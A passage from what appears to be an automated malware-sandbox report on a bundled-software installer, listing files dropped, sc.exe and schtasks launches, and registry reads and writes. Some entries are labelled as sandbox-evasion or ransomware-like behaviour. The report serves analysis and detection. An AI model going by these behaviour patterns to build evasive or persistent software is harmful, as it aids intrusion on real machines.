AntiVirus\Engine\21.1.0.18\ccGEvt.dll Process not Found File created C:\Program Files (x86)\Norton Identity Safe\MUI\2014.6.0.27\01\01\uiAlert.loc Process not Found File created C:\Program Files\WinZip\WzWFR64.dll msiexec.exe File created C:\Program Files\Softdeluxe\Free Download Manager\is-TK567.tmp fdm_x64_setup.tmp File created C:\Program Files (x86)\Norton Identity Safe\MUI\2014.6.0.27\19\01\diFVal.dll Process not Found File created C:\Program Files (x86)\BossLoader\is-MLMAJ.tmp BossLoader.tmp File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\16\01\ScanLess.loc Process not Found File created C:\Program Files (x86)\NortonInstaller\{92622AAD-05E8-4459-B256-765CE1E929FB}\NST\LicenseType\2014.6.0.27\msvcp100.dll Process not Found File created C:\Program Files (x86)\Norton Identity Safe\Engine\2014.6.0.27\SPManifests\ccCommon.spm Process not Found File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\0C\01\ScanLess.loc Process not Found File created C:\Program Files (x86)\NortonInstaller\{92622AAD-05E8-4459-B256-765CE1E929FB}\NST\LicenseType\2014.6.0.27\1f\01\InsBrand.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\0D\01\hsui.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\1F\01\diFVal.dll Process not Found File created C:\Program Files (x86)\Norton AntiVirus\Branding\zh-TW\muis.dll.mui Process not Found File created C:\Program Files (x86)\Norton Identity Safe\MUI\2014.6.0.27\IMAGES\ThumbnailViewIconEnabled.png Process not Found File created C:\Program Files\WinZip\WzWXFmfire64.dll msiexec.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSIA7CA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB2F6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE600.tmp msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\Sbkup64_ShortCut_Desktop.exe msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\SafeShareStub64_Shortcut_StartMenu.exe msiexec.exe File opened for modification C:\Windows\win.ini winzip64.exe File opened for modification C:\Windows\Installer\e628fe6.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIA12C.tmp msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\WinZip64_Shortcut_MenuGroup.exe msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\ImgUtilStub64_Shortcut_Desktop.exe msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\ImgUtilStub64_Shortcut_StartMenu.exe msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\SafeShare64_ShortCut_Desktop.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIB247.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB2E6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI15C2.tmp msiexec.exe File opened for modification C:\Windows\win.ini winzip64.exe File opened for modification C:\Windows\win.ini winzip64.exe File opened for modification C:\Windows\Installer\MSI11D6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA788.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICB8B.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8FB.tmp msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\DupFFStub64_Shortcut_Desktop.exe msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\PdfUtil64_Shortcut_Desktop.exe msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\Sbkup64_ShortCut_Desktop.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIB277.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB6A6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE0F9.tmp msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\PdfUtil64_ShortCut_StartMenu.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIA8B7.tmp msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\PdfUtilStub64_Shortcut_Desktop.exe msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\SbkupStub64_ShortCut_Desktop.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIA799.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE611.tmp msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\DupFF64_Shortcut_StartMenu.exe msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\SafeShareStub64_Shortcut_Desktop.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIA8A6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE663.tmp msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\DupFFStub64_Shortcut_StartMenu.exe msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\SbkupStub64_ShortCut_Desktop.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI5F97.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAAFC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB348.tmp msiexec.exe File opened for modification C:\Windows\win.ini winzip64.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\WinZip64_Shortcut_Preloader.exe msiexec.exe File opened for modification C:\Windows\Installer\MSI5B99.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8C9.tmp msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\ImgUtil64_Shortcut_StartMenu.exe msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\PdfUtilStub64_Shortcut_StartMenu.exe msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\SafeShare64_ShortCut_Desktop.exe msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\Sbkup64_ShortCut_StartMenu.exe msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\WinZip64_Shortcut_Preloader.exe msiexec.exe File opened for modification C:\Windows\win.ini winzip64.exe File opened for modification C:\Windows\Installer\MSI1206.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA4F6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAB0D.tmp msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\ARPPRODUCTICON.exe msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\WinZip64_Shortcut_Desktop.exe msiexec.exe File created C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\WinZip64_Shortcut_StartMenu.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIB327.tmp msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\PdfUtil64_Shortcut_Desktop.exe msiexec.exe File opened for modification C:\Windows\Installer\MSIE0FA.tmp msiexec.exe File opened for modification C:\Windows\Installer\{CD95F661-A5C4-44F5-A6AA-ECDD91C24143}\Sbkup64_ShortCut_StartMenu.exe msiexec.exe File created C:\Windows\Installer\e628fed.msi msiexec.exe File opened for modification C:\Windows\win.ini winzip64.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5116 sc.exe 9672 sc.exe 9924 sc.exe 6640 sc.exe 1116 sc.exe 9148 sc.exe 9456 sc.exe 9680 sc.exe 9600 sc.exe 9504 sc.exe 9552 sc.exe 9908 sc.exe 9812 sc.exe 6132 sc.exe 9972 sc.exe 9892 sc.exe 9876 sc.exe 7340 sc.exe 9480 sc.exe 9472 sc.exe 9704 sc.exe 9932 sc.exe 432 sc.exe 640 Process not Found 9656 sc.exe 9648 sc.exe 3180 sc.exe 1112 sc.exe 9080 sc.exe 9496 sc.exe 9696 sc.exe 9664 sc.exe 10012 sc.exe 9432 sc.exe 9624 sc.exe 9956 sc.exe 9884 sc.exe 9860 sc.exe 9836 sc.exe 9788 sc.exe 9520 sc.exe 9488 sc.exe 9948 sc.exe 9844 sc.exe 9772 sc.exe 9416 sc.exe 9640 sc.exe 9632 sc.exe 9564 sc.exe 9828 sc.exe 10004 sc.exe 9988 sc.exe 9916 sc.exe 9868 sc.exe 9820 sc.exe 9580 sc.exe 9572 sc.exe 9996 sc.exe 9964 sc.exe 9900 sc.exe 9804 sc.exe 6644 sc.exe 9464 sc.exe 9424 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 10 IoCs
pid pid_target Process procid_target 3036 4072 WerFault.exe 38 4680 4556 WerFault.exe 232 3592 1284 WerFault.exe 394 1040 1632 WerFault.exe 474 3092 4552 WerFault.exe 498 980 4416 WerFault.exe 502 4600 5468 WerFault.exe 506 2012 1816 WerFault.exe 564 4968 9212 Process not Found 2262 7736 3068 Process not Found 3611 -
Checks SCSI registry key(s) 3 TTPs 11 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000007c4a2b5d7b48cb040000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800007c4a2b5d0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809007c4a2b5d000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000007c4a2b5d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000007c4a2b5d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5528 schtasks.exe 1416 schtasks.exe 2616 schtasks.exe 7736 schtasks.exe 6816 schtasks.exe 7816 Process not Found 476 Process not Found 1768 schtasks.exe 4652 schtasks.exe 3404 schtasks.exe 1112 Process not Found 5536 Process not Found 4500 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4560 timeout.exe 9340 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 3964 Process not Found -
Enumerates system info in registry 2 TTPs 18 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS hola_cr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName hola_cr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer hola_cr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 1984 Go-http-client/1.1 -
Modifies Control Panel 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\Colors BossLoader.exe -
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "111" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "2518" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\Total = "2050" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "2051" winzip64.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION fdm_x64_setup.tmp Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\Total = "820" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "913" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\Total = "0" winzip27.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "111" winzip64.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\Total = "1291" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "2467" winzip64.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\DOMStorage\corel.com Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "820" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "2052" Process not Found Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FD7B051A-1E54-41f8-8A87-2F4349A8CCC8} Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "2050" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "235" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "1252" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "1325" winzip64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{92622AAD-05E8-4459-B256-765CE1E929FB}\AppPath = "C:\\Program Files (x86)\\Norton Identity Safe\\Engine\\2014.6.0.27" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "1213" winzip27.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\DOMStorage\corel.com winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "1250" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "1250" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "1323" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\Total = "2467" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "820" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "111" Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{535ED076-0FCD-4901-BB34-00073729D973}\Policy = "3" Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\winzip64.exe = "8000" msiexec.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "1373" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "4315" Process not Found Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "235" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\Total = "1292" Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{FAD61B3D-699D-49B2-BE16-7F82CB4C59CA}\Compatibility Flags = "1024" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\NumberOfSubdomains = "1" winzip27.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "1249" winzip64.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "1290" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\Total = "1342" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{0C55C096-0F1D-4F28-AAA2-85EF591126E7} Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FD7B051A-1E54-41f8-8A87-2F4349A8CCC8}\Compatibility Flags = "1024" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{535ED076-0FCD-4901-BB34-00073729D973}\AppName = "symerr.exe" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "1280" winzip27.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_GPU_RENDERING fdm_x64_setup.tmp Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "820" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "1156" winzip27.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "1323" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "1958" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "3226" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\Total = "235" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\Total\ = "1290" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "820" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\Total = "1252" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FD7B051A-1E54-41f8-8A87-2F4349A8CCC8} Process not Found Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage winzip27.exe Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\Total = "1249" winzip64.exe Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\corel.com\Total = "1138" Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\ipm.corel.com\ = "4355" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{6D53EC84-6AAE-4787-AEEE-F4628F01010C} Process not Found -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\fm\assoc = "1" winzip64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\Common\Update Notifier\Share\WinZip winzip64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs net_updater64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\WXF\WzWXFzshare\Default\MaxUploadSizeMB = "0" winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\WinZip Computing\WinZip Computing = "Please look in the Nico Mak Computing section for WinZip keys, values, and settings." winzip64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" winzip64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\fm\.GZ = "1" winzip64.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Nico Mak Computing\WinZip\Statistics\Collect = "1" winzip64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Nico Mak 